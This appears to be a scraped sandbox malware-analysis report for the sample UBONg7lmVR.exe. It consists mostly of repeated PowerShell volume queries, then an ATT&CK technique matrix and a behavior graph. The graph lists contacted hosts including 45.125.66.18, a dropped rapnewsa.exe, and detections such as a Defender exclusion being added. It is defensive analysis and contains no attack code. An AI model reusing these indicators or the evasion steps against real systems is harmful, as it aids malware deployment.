Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Native API
1
DLL Side-Loading
11
Process Injection
1
Masquerading
11
Input Capture
1
Query Registry
Remote Services11
Input Capture
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
11
Disable or Modify Tools
LSASS Memory211
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
Virtualization/Sandbox Evasion
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS141
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials3
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync24
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499702 Sample: UBONg7lmVR.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 75 46 s3-w.us-east-1.amazonaws.com 2->46 48 s3-1-w.amazonaws.com 2->48 50 5 other IPs or domains 2->50 64 Multi AV Scanner detection for submitted file 2->64 66 AI detected suspicious sample 2->66 68 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->68 9 UBONg7lmVR.exe 15 4 2->9         started        signatures3 process4 dnsIp5 54 bitbucket.org 185.166.143.49, 443, 49730 AMAZON-02US Germany 9->54 56 s3-w.us-east-1.amazonaws.com 52.216.51.233, 443, 49733 AMAZON-02US United States 9->56 42 C:\Users\user\AppData\...\y5cm2yzz.hwt.exe, PE32+ 9->42 dropped 13 y5cm2yzz.hwt.exe 3 9->13         started        file6 process7 dnsIp8 58 github.com 140.82.121.3, 443, 49747 GITHUBUS United States 13->58 60 raw.githubusercontent.com 185.199.111.133, 443, 49737, 49738 FASTLYUS Netherlands 13->60 62 httpbin.org 3.211.178.193, 443, 49750 AMAZON-AESUS United States 13->62 44 C:\Reka\rapnewsa.exe, PE32 13->44 dropped 80 Multi AV Scanner detection for dropped file 13->80 82 Suspicious powershell command line found 13->82 84 Adds a directory exclusion to Windows Defender 13->84 18 rapnewsa.exe 13->18         started        22 powershell.exe 23 13->22         started        24 powershell.exe 23 13->24         started        26 5 other processes 13->26 file9 signatures10 process11 dnsIp12 52 45.125.66.18, 443, 49749 TELE-ASTeleAsiaLimitedHK Hong Kong 18->52 70 Antivirus detection for dropped file 18->70 72 Multi AV Scanner detection for dropped file 18->72 74 Found evasive API chain (may stop execution after checking mutex) 18->74 78 3 other signatures 18->78 28 WerFault.exe 18->28         started        76 